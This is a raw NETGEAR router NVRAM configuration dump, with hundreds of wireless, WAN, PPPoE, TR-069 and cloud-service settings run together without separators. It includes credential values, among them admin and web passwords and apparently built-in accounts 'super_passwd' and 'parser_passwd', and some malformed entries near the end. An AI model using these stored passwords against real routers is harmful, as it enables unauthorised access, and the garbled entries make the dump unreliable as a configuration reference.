factorytraffic_IssueWarning_enable=0upnp_duration=3600local_ip9=0.0.0.0ver_check_enable=1wla_ssid_bc_2=1syslog_remoteLogLevel=7wl0_net_reauth=36000wl0_wps_mode=enabledlan1_proto=dhcphttp_lanport=80fwpt_timeout=1200wla_preauth=0local_ip10=0.0.0.0str_tbl_non_en=0cpe_periodicinform_interval=86400str_tbl_non_en_ver=0.0.0.0_0.0.0.0ping_timeout=17000local_ip4=0.0.0.052=384cenable_any_usb_dev=1qos_rule_count=-1wiz_dhcp_wait_time=5ddns_checked=0wps_modelnum=WNR3500Lv2wla_auth_type_4=automaticrequest_download=0acs_password=adminfw_email_email_alert=0wl0_wpa_gtk_rekey=0wla_ssid_4=NETGEAR-Guest3local_ip8=0.0.0.0timer_interval=3600wps_aplockdown=0wla_ssid_bc_4=1acs_provisioncode_bak=-wan0_vccId=0wla_nCtrlsb=nonewla_sec_profile_name_2=NETGEAR1ipa0_ip_gateway=0.0.0.0TR111_num=0potInterval=60pppoe_dod=1ipsrv0_static=0wan_interface_number=1pppoe_localip=0.0.0.0nat_inbound_filtering=1wla_temp_secu_type=Noneppa0_remote_ip=0.0.0.0fw_email_email_enable=0wla_tpcDb=0atmVcc0_qos=1bpa_dod=1run_test=0wla_dtmIntvl=1wps_addER=0lang_check_config_file_dir=stringtablesping_interface=-syslog_serverIP=0.0.0.0supported_languages=Englishpppoe_idletime=300wla_temp_defaKey_3=0ppp0_idle_timeout=300ver_check_config_file=fileinfo.txtpptp_dod=1wla_wme=1ping_host=192.168.1.1wla_temp_region=5syslog_serverPort:=0.0.0.0WAN_Internet_Access=1wla_wmeNoAck=0pppoa_mru=1458cpe_dl_fault=-atmVcc0_encap=LLCwla_secu_type_4=Nonecpe_dl_end=-ppa0_debug=0wan0_igmp_proxy_enable=0lan1_dhcp=0wla_ssid=NETGEARsmb_group_name=Workgroupwla_temp_ssid_2=NETGEAR-Guesttraffic_watermark=0wla_ssid_2=NETGEAR-Guestlan_lease=86400traffic_round_up_volume=0ddns_last_ip=0.0.0.0upnp_DHCPServerConfigurable=1wl0_mode=apwla_temp_profile_name_4=NETGEAR3atmVcc0_enable=1ver_check_ftp_svr3=updates1.netgear.comcpe_url=-ezc_enable=1wl_version=3.90.23.0wla_frameBurst=onping_dscp=0restart_processes=0wla_dfsPostIsm=60pptp_idletime=5wla_antDiv=0ipa0_ip_mask=0.0.0.0cpe_url_bak=-wan0_dns_sel=0wla_wmm_advert_3=1wla_sec_profile_enable=1tftp_serv_ipaddr=192.168.1.2wla_ampdu=onwan0_fw_enable=1wla_temp_profile_name_3=NETGEAR2wla_temp_setting_2=0bs_trustedip=192.168.1.0lan1_gateway=192.168.2.1str_tbl_en_ver=1.0.0.24_2.1.30.1wps_modelname=WNR3500Lv2wla_bcnIntvl=100manufacturer_name=Netgearwla_auth_type_3=automaticwla_lazyWds=0usb_mount_signal=0wla_wep_length_3=0wla_temp_profile_name_2=NETGEAR147=15a9atmVcc0_vci=35wla_wep_length_2=0wla_secu_type_2=Nonewla_maxAssoc=128wla_isolation=0wan0_proto=merwla_afterBurnerEn=offwla_sec_profile_enable_2=0wla_wlanstate=Enablestart_tfmeter=0pppoe_max_echo_fail=3wla_ssid_1=Guestwps_perm_lock=0pppoe_keepalive=1wps_mfstring=NETGEAR, Inc.lan_ifname=br0super_passwd=GeardogatmVcc0_aal=aal5lock_list=-atmVcc0_adminStatus=1brs_lang_check_enable=1bpa_status=0wla_wmm_advert_4=1wla_nMcsidx=-1wla_secu_type_3=Noneezc_version=2lanip_setup_changed=0cpe_periodicinform_time=0wla_temp_wlanstate=1wan_hostname=DGN2200parameter_key=-wla_type=apqos_bw_enable=0acs_url=http://172.19.92.139:1234nat_interface_idx=1wl_wps_reg=enabledwla_temp_ssid=NETGEARalternateDns=0.0.0.0wlan_acl_num=64http_rmenable=0ppp0_dod=1local_ip5=0.0.0.0wla_ssid_bc=1fwpt_count=0ipoa_netmask=0.0.0.0wla_wds_enable=0ppp0_ip_addr=0.0.0.0wan_pppconn_name=PPPoEwps_force_restart=yure_disable=1wla_wmm_advert_2=1wla_secu_type=Nonewla_temp_broadcast=ssid_24G_bcwan_gateway=0.0.0.0wl0_bss_enabled=1ppp0_auth_method=0ppa0_ip_addr=0.0.0.0ipa0_static=1atmVcc0_vpi=8bpa_server=login-serverppa0_netmask=0.0.0.0bpa_idletime=5http_lang=enwla_sec_profile_enable_3=0dhcp_end=192.168.1.254ntp_server=192.5.41.40 192.5.41.41 133.100.9.2http_rmendip=255.255.255.255atmTd0_service=ubrrun_wiz=0syslog_localLogLevel=7wla_broadcast=1local_ip6=0.0.0.0ppp0_static_ip=0enblIgmpSnp=0ntp_update_interval=86400wla_temp_setting=0wan_bpa_minheartbeat=2wla_nReqd=0wps_uuid=0x000102030405060708090A0B0C0D0EBBtr069_enable=0wan_bpa_localport=5050wla_regMode=0wla_temp_channel=0IPConnExtIP_111=-ver_check_stringtable_dat=stringtable.datatmVcc0_multiplex=llcencapswla_phyType=gwla_temp_defaKey_2=049=fe99bs_enable=0atmTd0_peakCellRate=0pppoe_echo_interval=30http_passwd=passwordenblIgmpMode=0wps_aplockdown_count=3wan_ifnames=eth0wps_aplockdown_duration=31536000wla_sec_profile_name_4=NETGEAR3wan_bpa_maxheartbeat=20adsl_setting_map=0x0000007fwan_access_type=DSLatmVcc0_port=0wla_preamble=longddns_update_time=0upnp_turn_on=1cpe_dl_furl=-wla_rts=2347wla_sec_profile_enable_4=0ID=pci/0/2/wlg_ap_isolate=0wl23_auth_mode=nonewl141_auth_mode=nonewlg_temp_ssid=NETGEAR-5Guser_setup_num=5wl17_auth_mode=nonewlg_repeater=0wl199_wep=disabledwl_frameburst=onRA_AdvOtherConfigFlag=onwlg_auth_type=automaticwl151_wep=disabledwl154_auth_mode=nonewla_temp_enable=enable_apwl203_auth_mode=nonewl150_auth_mode=nonewlg_txbf=1wl128_wep=disabledsecond_wan_status=0wl70_auth_mode=nonedual_band=1RA_AdvDefaultPreference=lowpppoe2_session_id=0ap_dyn_dns=1wl_rate=0wl73_auth_mode=nonevlan_prio=0wl238_auth_mode=nonewl_country=GBwla_allow_see_access_2=0wl_gmode=GMODE_AUTOwlg_en_secu_type=WPA-AUTOwl42_auth_mode=nonewl37_auth_mode=nonewl162_auth_mode=nonewl_wme_5g=1vlan_ports=0xFFwan2_netmask=0.0.0.0wl34_wep=disabledwl1_stbc_rx=1ntp_is_synced=0wl44_auth_mode=noneled_settings=en_blinkwl194_auth_mode=nonewl_country_code=GBvideo_qos_delta_bwl=100lan_ipv6_link_local_addr=fe80:0000:0000:0000:02ff:ffff:feff:ffffwl91_wep=disabledwl179_wep=disabledwl39_wep=disabledwl139_wep=disabledwl103_auth_mode=nonewl253_wep=disabledaccess_all_new_devices=1static_l2tp_enable=0wl187_auth_mode=noneleafp2p_peer_router_type=1pppoe2_west_username=flets@fletswl238_wep=disabledwl242_wep=disabledwl22_wep=disabledvht_tkip_reject=1wl254_wep=disabledRA_AdvRetransTimer=0wl59_wep=disabledwl226_auth_mode=nonewl_phytype=nwl85_auth_mode=nonewl_wme_apsd=onwl61_wep=disabledwl77_auth_mode=none:=0wl202_auth_mode=nonewl130_auth_mode=nonelog_filter=65535fcc_dfs_ch_enable=0wps_version2=enabledcontent_scan=1wlg_wpa_gtk_rekey=3600wl150_wep=disabledvideo_qos_bwl_limit_real_percent=60wl175_wep=disabledwl229_wep=disabledwl11_wep=disabledwl36_auth_mode=nonepppoe_policy_num=0wl173_wep=disabledwl_leddc=0x640000ipv6_6to4_router=192.88.99.1wl86_auth_mode=nonewl216_auth_mode=nonewl177_auth_mode=nonewl_gmode_protection=autowl231_wep=disabledwl33_wep=disabledwl105_wep=disabledwl223_auth_mode=nonewl215_wep=disabledwlg_radius_port=1812wl148_auth_mode=noneleafp2p_debug=0wl242_auth_mode=nonewl193_auth_mode=nonewl_radarthrs=0 0x6a8 0x6c8 0x6ac 0x6c7x_discovery_url=https://presence.ngxcld.com/presence/presencewl107_wep=disabledwl56_wep=disabledwl248_wep=disabledwps_config_command=0wl123_wep=disabledwl81_wep=disabledbrowser_language=Englishwl_wme_sta_vi=7 15 2 6016 3008 off offwl59_auth_mode=nonewl133_auth_mode=nonewl76_auth_mode=nonewl129_auth_mode=nonewps_ifname=allwl97_auth_mode=nonewl243_auth_mode=nonewl158_auth_mode=nonewl126_wep=disabledwl43_auth_mode=nonewl_rxchain_pwrsave_quiet_time=1800wl_wme_2g=1wl_radio=1wl2_auth_mode=nonewl90_auth_mode=nonewl49_auth_mode=nonewl94_wep=disabledwl98_wep=disabledwl249_auth_mode=nonewl119_auth_mode=nonesingle_pppoe_login=0gui_Wireless_Security_state=nonel2tp_ip_sel=0wl147_wep=disabledwl165_wep=disabledwl52_auth_mode=nonevlan1ports=1 2 3 4 8*wl_plcphdr=longwl189_wep=disabledwl231_auth_mode=nonebridge_interface=0wl_crypto=tkipwl86_wep=disabledwl87_auth_mode=nonewl10_auth_mode=noneWifiSchedule_5GRadioDown=0wlg_ssid_2=NETGEAR-5G-Guestwlg_preamble=longwl148_wep=disabledwl154_wep=disabledlast_auto_ip=0.0.0.0wla_defaKey_4=0wla_ap_isolate=0wl92_wep=disabledwla_defaKey_2=0pause_wan_lan_conflict=0wl_wme_ap_vi=7 15 1 6016 3008 off offwl_vlan_prio_mode=offwlg_band=2.4Gopenvpn_protocol=udpwl35_auth_mode=nonewl239_auth_mode=nonewl182_auth_mode=nonewl_tpc_db=0x_register_url=https://registration.ngxcld.com/registration/registerwl47_wep=disabledwl137_wep=disabledRA_use_dynamic_lifetime=0readycloud_use_xcloud=1wl_rxchain=7pppoe_tmp_idletime=300openvpn_service_port=12974qos_update_interval=86400wl104_wep=disabledafpd_enable=1gui_GuestNetwork_enable=nonewl167_wep=disabledwl175_auth_mode=nonewl109_wep=disabledvideo_qos_force_drop_period=10wl66_wep=disabledwl157_auth_mode=nonevlan_iptv_interfaces=0x00wl89_auth_mode=noneapmode_dns1=0.0.0.0wl_pcie_mrrs=128lanip_wds_setup_changed=0wl24_wep=disabledvideo_qos_per_tolerance_pickup=10wl79_auth_mode=nonewl14_auth_mode=noneqos_update_enable=0dome_led_status=ONwl60_wep=disabledwl_frag=2346wl53_wep=disabledwl184_wep=disabledwl185_wep=disabledwl179_auth_mode=nonepppoe_wan_dns_sel=0wl68_auth_mode=nonewl98_auth_mode=nonewlg_temp_secu_type=Noneiptv_enabled=0wl241_auth_mode=nonewl41_wep=disabledx_claimed_url=https://registration.ngxcld.com/registration/statuswl144_wep=disabledwl_closed=0wl158_wep=disabledparser_username=Gearparwl19_wep=disabledwl_wps_5g_config_state=0ap_dyn_ip=1x_advisor_url=https://advisor.ngxcld.com/advisor/directpppoe2_dod=0wlg_auth_type_2=automaticwl215_auth_mode=nonewl107_auth_mode=nonewl128_auth_mode=nonewl69_wep=disabledwl78_wep=disabledwifi_sche_off=Enablewl213_wep=disabledwl206_wep=disabledwl134_wep=disabledwl207_auth_mode=nonewl137_auth_mode=nonewan2_ipaddr=0.0.0.0wl109_auth_mode=nonepppoe2_bs_enable_temp=0wl34_auth_mode=nonewlg_wmm_advert_2=1wl140_auth_mode=nonewl216_wep=disabledwl6_wep=disabledwl209_auth_mode=nonewl_mrate=0wl9_wep=disabledipv6ready=0RA_AdvValidLifetime=2400wl248_auth_mode=nonewl255_auth_mode=nonewl12_auth_mode=noneWifiSchedule_2GRadioDown=0wl101_auth_mode=nonewl20_wep=disabledwlg_wep_length_2=0wl56_auth_mode=nonewl50_wep=disabledwl161_wep=disabledwl97_wep=disabledRA_MaxRtrAdvInterval=600wl77_wep=disabledwl157_wep=disabledwl22_auth_mode=nonewl57_wep=disabledwl152_wep=disabledvideo_qos_win_running=5wl234_auth_mode=nonesuccess_page_hijack=0gui_GuestNetwork_sec_profile=nonewl66_auth_mode=noneet_txq_thresh=1024wl127_auth_mode=nonewl228_wep=disabledpppoe2_temp_type=4wl244_wep=disabledwl46_auth_mode=nonewl135_auth_mode=nonewl233_wep=disabledenable_vlan=disablewl29_wep=disabledvlan2hwname=et0wl146_wep=disabledwl237_wep=disabledrip_filter_enable=0wl20_auth_mode=nonewl40_auth_mode=nonewl46_wep=disabledchannel_mode=Defaultnew_firmware_available=0wl47_auth_mode=nonepppoe2_keepalive=0runtest=0wla_allow_access_4=0wl16_wep=disabledwlg_wds_mode=1wl156_auth_mode=nonewl0_assoc_retry_max=20wl185_auth_mode=nonewla_radius_ip=0.0.0.0wl114_auth_mode=nonewl_wme=onwl142_auth_mode=nonewl124_auth_mode=nonewl44_wep=disabledwl89_wep=disabledwl100_wep=disabledwlg_temp_defaKey=0pppoe2_mtu=1454video_qos_need_check_bwh_in_vague=0wl166_wep=disabledgenie_remote_certificate=/opt/xagent/certs/ca-bundle-mega.crtwl236_auth_mode=nonewl233_auth_mode=nonewl210_auth_mode=nonewl1_wps_config_state=0wl96_wep=disabledpppoe_localgateway=...wl146_auth_mode=nonewl18_auth_mode=nonewl205_auth_mode=nonewps_restart=0wl200_wep=disabledwl220_auth_mode=nonewl186_auth_mode=nonewl160_wep=disabledwl1_radarthrs=1 0x6ac 0x6dc 0x6bc 0x6ec 0x6ac 0x6dc 0x6bc 0x6ecpptp_user_ip=...wl27_wep=disabledgbsd_trial_intf=0video_qos_win_adapt=1wl13_auth_mode=nonewl155_wep=disabledbasic_setting=0wl_chanspec=0wl180_wep=disabledwl246_auth_mode=nonewl_wme_txp_vi=7 3 4 2 0igmp_proxying_enable=0wlg_ssid_bc_2=1wl212_auth_mode=nonedlna_auto_ip=0wl38_wep=disabledwl111_wep=disabledx_handler_1004=127.0.0.1:10101wl116_auth_mode=nonewl224_auth_mode=nonewl102_auth_mode=nonewl217_wep=disabledwl173_auth_mode=nonepppoe2_idletime=300wl221_wep=disabledstatic_pppoe_enable=0ipv6rd_auto_mode=1wl183_auth_mode=nonewl241_wep=disabledwl132_auth_mode=nonetmp_wla_wds_enable=0wl199_auth_mode=nonepppoe_flet_sel=fletdisablewl110_wep=disabledwl217_auth_mode=nonewl_bss_maxassoc=128video_qos_zero_traffic=10video_qos_rang_persent=30wl204_wep=disabledwl177_wep=disabledwla_wpa_gtk_rekey=3600wl_wme_txp_be=7 3 4 2 0gui_Internet_state=0wl_dfs_postism=60filter_macmode=disabledpppoe2_flag_Emin=0wl138_wep=disabledwl64_auth_mode=nonepppoe_tmp_username=guestRA_AdvOnLink=onwl156_wep=disabledwps_start=noneenable_sta_mode=0leafp2p_service_0=RouterRemote,0,1,1,0,1,6:135,6:136,6:137,6:138,6:139,6:445,6:548,17:135,17:136,17:137,17:138,17:139,17:445,17:548wl_wme_txp_bk=7 3 4 2 0wl252_wep=disabledpptp_user_netmask=...wl_wme_bss_disable=0ddns_netgear_hoststatus=2wl212_wep=disabledemf_enable=0leafp2p_firewall=0vlan2ports=4 8uLangTagChinese=0wl30_wep=disabledwl111_auth_mode=nonewl93_wep=disabledwla_defaKey_3=0apmode_gateway=0.0.0.0wl58_wep=disabledwl_bss_enabled=1wl_auth=0wl_wme_sta_vo=3 7 2 3264 1504 off offwl60_auth_mode=nonewl_rxchain_pwrsave_pps=10ce_dfs_ch_enable=1wl1_stbc_tx=autowan_hwaddr=00:FF:FF:FF:FF:FFwl164_auth_mode=nonepppoe2_username=guestwl48_auth_mode=nonewl11_auth_mode=noneopenvpn_iface_type=tapRA_MinRtrAdvInterval=198wl133_wep=disabledWifiSche_botton_state=0wl196_auth_mode=nonewl244_auth_mode=nonewl_mimo_preamble=mmwl16_auth_mode=noneauto_conn_24hr=Disablewlg_sec_profile_enable_2=0single_firmware_en=1wl247_auth_mode=nonewl208_wep=disabledwl18_wep=disabledipv6_proto=disablewl117_auth_mode=noneipv6_6to4_sla_id=58482wl72_wep=disabledl2tp_user_netmask=...wl127_wep=disabledpptp_localip=0.0.0.0wl_ampdu_rr_rtylimit_tid=2 2 2 2 2 2 2 2first_wan_status=0wl7_auth_mode=nonewl80_auth_mode=nonewl121_wep=disabledwlg_defaKey=0wl61_auth_mode=nonewl125_auth_mode=nonewl120_auth_mode=nonewan_status=downwl78_auth_mode=nonecgi_debug_msg=0wl143_auth_mode=nonewl143_wep=disabledleafp2p_connection_method_type=2l2tp_conn_id=WNR3500Lv2wps_lock_start_cnt=3wl247_wep=disabledwl211_auth_mode=nonewl165_auth_mode=nonewl230_auth_mode=nonewl234_wep=disabledgui_AttachedDevices_num=0wl51_wep=disabledwl117_wep=disabledipv6rd_wan_dns_sel=0wl9_auth_mode=nonewl88_wep=disabledwl38_auth_mode=nonewl171_auth_mode=nonewl0_stbc_rx=1wl50_auth_mode=nonewl152_auth_mode=nonewl227_auth_mode=nonewl220_wep=disabledwl162_wep=disabledwl53_auth_mode=nonevideo_qos_delta_bwl_min=100wl83_wep=disabledwl_sta_retry_time=5wl_ap_isolate=0wl70_wep=disabledwl193_wep=disabledwl5_auth_mode=nonewl243_wep=disabledwl106_auth_mode=noneenable_implicit_beamforming=1wl134_auth_mode=noneparser_passwd=Gearucpwlg_frag=2346wl_txbf_timer=25ctf_disable=0wl88_auth_mode=nonewl31_auth_mode=nonewl69_auth_mode=nonepktc_disable=0wl169_wep=disabledwl_dfs_preism=60wl200_auth_mode=nonewl112_auth_mode=nonelan_interface=vlan1enable_band_steering=0active_readycloud=1oray_ddns_constatus=offlinewl_dmatxctl=0x24c0040wl21_auth_mode=noneoray_ddns_service_type=---wl118_wep=disabledwl_dmarxctl=0x4c0000wlg_defaKey_2=0wl84_wep=disabledleafp2p_remote_url=http://peernetwork.netgear.com/peernetwork/services/LeafNetsWebServiceV2wl246_wep=disabledwl26_auth_mode=nonewlg_ssid=NETGEAR-5Gwl131_auth_mode=nonewl43_wep=disabledfw_rsp_ping_old=0wl8_auth_mode=noneddns_netgear_success=2wl184_auth_mode=noneenable_ccs=0wl42_wep=disabledwl1_wep=disabledwlg_wep_length=0wl_mcast_regen_bss_enable=1wl122_wep=disabledwl_radius_port=1812wl227_wep=disabledwl210_wep=disabledwl214_auth_mode=nonewl_lazywds=0genie_remote_url=https://genieremote.netgear.com/genie-remote/claimDevicewl138_auth_mode=nonewl145_wep=disabledwlg_allow_access_2=0wl252_auth_mode=nonewl30_auth_mode=nonewl213_auth_mode=noneleafp2p_replication_url=https://readyshare.netgear.com/device/entrywl249_wep=disabledwl151_auth_mode=nonewlg_mode=HT80wl201_auth_mode=noneacosnat_ctf_disable=0wl237_auth_mode=nonetmp_lan_ipaddr=0.0.0.0wl57_auth_mode=noneauto_conn_time=0wl224_wep=disabledwl74_wep=disabledwl153_wep=disabledtmp_register_name=1wl32_wep=disabledwl219_wep=disabledwl153_auth_mode=nonewl190_wep=disabledpppoe2_east_passwd=gueststr_tbl_default_check=1wl206_auth_mode=nonevideo_qos_enable=0traffic_cntime_monthly_limit=0wl_wme_ap_be=15 63 3 0 0 off offpppoe2_authtype=0wl62_auth_mode=nonewl145_auth_mode=nonewl160_auth_mode=nonepassword_question1=0pppoe2_fw_bks_block_type=0wlg_temp_band=5Gwl94_auth_mode=nonewan2_ipaddr_old=0.0.0.0wl96_auth_mode=nonewl41_auth_mode=nonewl235_auth_mode=nonewl68_wep=disabledwl79_wep=disabledwl95_wep=disabledvlan_id=10wl_antdiv=-1wl218_wep=disabledvideo_qos_win_bwchg=3ipv6_auto_type=DHCP/Auto Configwl245_wep=disabledwl62_wep=disabledvideo_qos_bwl_zero=50wl40_wep=disabledwl251_auth_mode=nonewl_mode=apwl_wpa_gtk_rekey=0acs_ifnames=eth1wl188_wep=disabledvideo_qos_win_bwhdrop=4wl232_wep=disabledvlan_rule_enable=1wl1_ifname=eth2pppoe2_flag_Smin=0wl208_auth_mode=nonewl80_wep=disabledtmp_lan_netmask=0.0.0.0wl15_auth_mode=nonemacaddr=00:FF:FF:FF:FF:FFwl253_auth_mode=nonewlg_rts=2347hd_idle_debug=0wlg_radius_ip=0.0.0.0wl106_wep=disabledipv6_interfaceid_enable=0wl209_wep=disabledwla_onoff=Disablewps_method=1wl_radio_pwrsave_pps=10wl_rxchain_pwrsave_enable=1wl13_wep=disabledqos_bw_tmp_uplink=512000lan_dhcpsv6_enable=0pppoe_switch=1wps_status=0share_api_num=10openvpn_redirectGW=autowl187_wep=disabledleafp2p_services=1wl178_auth_mode=nonewl180_auth_mode=nonevlan1hwname=et0wl235_wep=disabledwl149_auth_mode=nonewl_ampdu_rtylimit_tid=5 5 5 5 5 5 5 5wl236_wep=disabledwl19_auth_mode=nonewl_bcn_rotate=1wl104_auth_mode=nonewl219_auth_mode=noneRA_AdvManagedFlag=offwl198_auth_mode=nonewl52_wep=disabledwl174_auth_mode=nonepptp_ip_sel=0vlan_name=Internetwl113_auth_mode=nonewl197_auth_mode=nonepppoe2_mru=1454qos_down_streaming_enable=0wl181_auth_mode=noneRA_AdvDefaultLifetime=1800wl196_wep=disabledwl1_txbf_bfr_cap=1wl6_auth_mode=nonewl172_wep=disabledru_igmp_enable=0pppoe2_west_passwd=fletswla_autochannel=enablewl_wme_ap_vo=3 7 1 3264 1504 off offwl141_wep=disabledrip_version=2enable_password_recovery=0wl171_wep=disabledperformance_boost=1wl99_wep=disabledlan_dhcpsv6_lifetime=86400pppoe_flet_type=0wl232_auth_mode=nonepppoe_tmp_mtu=1454wla_allow_access_3=0wl28_auth_mode=nonewl_nband=2static_pptp_enable=0wl_wep=disabledvideo_qos_rang_number=0wlg_temp_mode=300Mbpswps_proc_status=0wps_aplockdown_disable=0wl82_auth_mode=nonesche_tmp_set=0wl49_wep=disabledwl73_wep=disabledwl229_auth_mode=nonewl74_auth_mode=nonemedia_name=ReadyDLNA: R6400wl_stbc_tx=autowl_mbss_skipctf=1wl_radio_pwrsave_level=0wl125_wep=disabledwl108_auth_mode=nonewlg_temp_broadcast=ssid_5G_bcwl214_wep=disabledwl7_wep=disabledwl140_wep=disabledtelec_dfs_ch_enable=1wl168_wep=disabledrip_enable=0wan2_dns_sel=0wl166_auth_mode=nonewl31_wep=disabledvideo_qos_high_ip=0.0.0.0wl102_wep=disabledwl203_wep=disabledwl221_auth_mode=nonechg_from_bridge=0ddns_cgi_alarm=0traffic_volume_monthly_limit=0wl211_wep=disabledwl122_auth_mode=nonewl_amsdu=autowl251_wep=disabledwl169_auth_mode=nonewl75_wep=disabledenable_atf=1wl168_auth_mode=nonegui_Wireless_Radio_state=nonewl99_auth_mode=nonewl75_auth_mode=nonewl83_auth_mode=nonewl_radio_pwrsave_enable=0wlg_secu_type_2=Nonegbsd_ifnames=eth1 eth2wl_maxassoc=128wl28_wep=disabledwl_wme_txp_vo=7 3 4 2 0wl123_auth_mode=nonewl8_wep=disabledwl17_wep=disabledfirst_brs_lang=Englishwl64_wep=disabledtmp_wla_repeater=0wl222_auth_mode=noneauto_enable=1wl116_wep=disabledwl170_auth_mode=nonewl82_wep=disabledwl21_wep=disabledwl65_auth_mode=nonewl192_auth_mode=nonewla_allow_access_2=0wl230_wep=disabledwl1_txbf_bfe_cap=1wl188_auth_mode=nonewl136_auth_mode=noneloaddefault_VerStamp=V1.0.0.26password_question2=0ipv6rd_wan_mtu=1480tivo_enable=1wl183_wep=disabledshow_web_title=1video_qos_equal_method=0wl110_auth_mode=nonewl164_wep=disabledddns_netgear_confirmpasswd=2wl130_wep=disabledwl254_auth_mode=nonewl114_wep=disabledwl189_auth_mode=nonelan_dhcpsv6_pref=255wl0_obss_coex=1wl194_wep=disabledinternal_antenna=0wl0_txbf_bfr_cap=1usb_file_system=ntfswl124_wep=disabledwl191_auth_mode=noneipv6_enable=0leafp2p_sys_prefix=/opt/remotewl159_auth_mode=nonewl90_wep=disabledwl_reg_mode=offwlg_wds_enable=0wl147_auth_mode=nonewl84_auth_mode=nonewl105_auth_mode=noneopenvpn_route_delay=5tmp_lan_proto=nullwlg_secu_type=Nonewl163_wep=disabledwl1_auth_mode=nonelan_hwaddr=00:FF:FF:FF:FF:FFwl129_wep=disabledmevent_ifnames=eth1 eth2 wl0.1 wl1.1lan_wps_oob=enabledwl207_wep=disabledwl54_auth_mode=nonewl_nreqd=0rcagent_log_level=debugwl250_auth_mode=nonewl55_auth_mode=nonetmp_rip_enable=nullwl_nmcsidx=-1wl37_wep=disabledwl_txq_thresh=1024wl33_auth_mode=nonewl240_wep=disabledwan2_gateway=0.0.0.0wl48_wep=disabledwl76_wep=disabledRA_AdvAutonomous=onipv6_6to4_tunnel=downwl_wds_timeout=1wlg_wds_pmp_sta=1wl39_auth_mode=nonewl163_auth_mode=nonewl_rateset=12wl195_wep=disabledwl_txchain=7wl115_auth_mode=nonewl72_auth_mode=nonewl101_wep=disabledwl95_auth_mode=nonewan_dns=0.0.0.0wl54_wep=disabledwl63_wep=disabledvideo_qos_per_tolerance=50l2tp_user_ip=...wl4_wep=disabledwl131_wep=disabledwl_auth_mode=nonewl226_wep=disabledwl63_auth_mode=nonepppoe2_bs_enable=0wl85_wep=disabledwl45_wep=disabledwps_method_cgi=pbcwl67_auth_mode=noneenable_other_mode=0pppoe2_localip=0.0.0.0pppoe2_ifname=ppp1tmp_wlg_wds_enable=0wlg_channel=44wl205_wep=disabledwl_bw_cap=1RA_AdvPreferredLifetime=1800wl_afterburner=offneed_to_load_wireless=0wl228_auth_mode=noneiserver_enable=0upgrage_to_4_30=1wl100_auth_mode=nonewl103_wep=disabledwlg_onoff=Disablepppoe2_east_username=guest@fletswl45_auth_mode=nonewl155_auth_mode=noneqos_bw_set_sel=1wl_nmode=-1wl149_wep=disabledwl126_auth_mode=nonewl_rts=2347wl245_auth_mode=nonewl120_wep=disabledwl_txstreams=0wl172_auth_mode=noneqos_xbox_detected_down=0wl5_wep=disabledwl_wme_ap_bk=15 1023 7 0 0 off offshow_firmware_info=0run_mld=0wifi_on_off=1wl144_auth_mode=noneiptv_interfaces=0x00wl161_auth_mode=nonewl92_auth_mode=nonewl23_wep=disabledlan_ipv6_link_local_addr_short=fe80::5054:ff:fe12:3457enable_ap_mode=0wl108_wep=disabledddns_server=4wl14_wep=disabledas_genie=0wl_net_reauth=36000wla_en_secu_type=WPA-AUTOwl36_wep=disabledwl197_wep=disabledwl_dtim=2RA_AdvLinkMTU=1800wl167_auth_mode=nonewl3_wep=disabledwl174_wep=disabledwl4_auth_mode=nonewl195_auth_mode=nonehd_idle_period=1800wl218_auth_mode=nonewl135_wep=disabledwla_wlanstatenvram_get_buf:=0.0.0.0wl_wme_no_ack=offRA_AdvCurHopLimit=64active_user_setup=1ap_mode_lan_disable=0wl67_wep=disabledwl91_auth_mode=nonepppoe_tmp_localip=0.0.0.0wl0_wep=disabledwlg_allow_see_access_2=0wl_wme_sta_be=15 1023 3 0 0 off offleafp2p_rescan_devices=1wl170_wep=disabledwl181_wep=disabledwl239_wep=disabledwps_lock_forever_cnt=3wl65_wep=disabledvideo_qos_delta_bwl_pickup_min=25wl_nmode_protection=autowl58_auth_mode=nonerip_dir=1wl191_wep=disabledwl0_txbf_bfe_cap=1pppoe2_schedule_enable=0pppoe_localnetmask=...wl2_wep=disabledwl1_psr_mrpt=0wl_bcn=100wl27_auth_mode=nonewl71_wep=disabledwlg_wlanstate=Enablevideo_qos_avgQ_size=5qos_xbox_detected_up=0wlg_wds_ptp_sta=1wl113_wep=disabledwl25_auth_mode=nonewl225_wep=disabledwl26_wep=disabledwl10_wep=disabledpppoe_flet_keyword=fletswl118_auth_mode=nonewl201_wep=disabledwl71_auth_mode=nonebsd_enable=1x_handler_1003=/opt/xagent/genie_handlerwl159_wep=disabledqos_db_ver=0wl240_auth_mode=nonetelnetd_enable=0wl_wmf_bss_enable=0wl142_wep=disabledwl176_wep=disabledwl223_wep=disabledwl15_wep=disabledwl186_wep=disabledwl35_wep=disabledwl176_auth_mode=nonel2tp_idle_time=5ddns_netgear_haveaccount=0video_qos_bwh_min=250tmp_wlg_wlanstate=Enablewl121_auth_mode=nonewl25_wep=disabledwl132_wep=disabledleafp2p_replication_hook_url=https://readyshare.netgear.com/device/hookwl204_auth_mode=none0=smtp_portwl115_wep=disabledwl198_wep=disabledwl182_wep=disabledwl112_wep=disabledwl136_wep=disabledwl255_wep=disabledwl_ampdu=autowl24_auth_mode=nonewl29_auth_mode=nonewl_rifs_advert=autovideo_qos_win_bwstable=5wl_wme_sta_bk=15 1023 7 0 0 off offwl0_auth_mode=nonewlg_broadcast=ssid_5G_bcwifi_test=1wl222_wep=disabledwl250_wep=disabledwl139_auth_mode=nonewl1_assoc_retry_max=20pppoe2_demand=0RA_AdvReachableTime=0l2tp_localip=0.0.0.0autoBlock=0wl_infra=1wl55_wep=disabledwl51_auth_mode=nonewl87_wep=disableddlna_enable=1wl3_auth_mode=nonewl12_wep=disabledwl32_auth_mode=nonewl_rxstreams=0wl119_wep=disabledwl93_auth_mode=noneopenvpnActive=disablewl225_auth_mode=nonewl178_wep=disabledwl202_wep=disabledwlg_temp_channel=36video_qos_predrop_period=15wl0_stbc_tx=autoauto_ip_backup=0wl190_auth_mode=noneipv6_6to4_relay=0dmz_ipaddr=192.168.1.0wl81_auth_mode=noneleafp2p_run=0wl192_wep=disabledvlan_lan_id=1pr_wiz_is_from_default=1l2tp_redial=303g_radio_status=1cpe_DeviceSummary=InternetGatewayDevice:1.0[](Baseline:1)atmf5diagnostics7_state=Nonewireless_test=1syslog_statusnvram_get_buf:=0wlan_acl_numnvram_get_buf:=192.168.0.1atmf5diagnostics3_state=Nonedevice_mode=0atmf5diagnostics6_state=Nonepppoe_relay_enable=0value_change=30wps_proc_statusnvram_get_buf:=5startvpn=0is_defaultnvram_get_buf:=255.255.255.0reset_test=1atmf5diagnostics4_state=Nonewla_temp_passphrasenvram_get_buf:=0ntp_is_syncednvram_match=: 